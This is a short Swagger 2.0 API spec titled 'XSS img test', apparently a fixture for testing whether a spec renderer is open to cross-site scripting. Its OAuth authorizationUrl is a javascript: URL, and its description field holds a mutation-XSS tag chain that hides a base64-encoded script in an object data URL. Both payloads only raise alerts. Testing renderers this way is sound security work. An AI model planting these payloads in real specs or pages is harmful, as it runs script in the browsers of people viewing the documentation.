swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "1.0.0"
  title: XSS img test
  description: test <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgndXgxcCcpPC9zY3JpcHQ+'></object>"></form>

paths:
  /:
    get:
      responses:
        200:
          description: Successful response
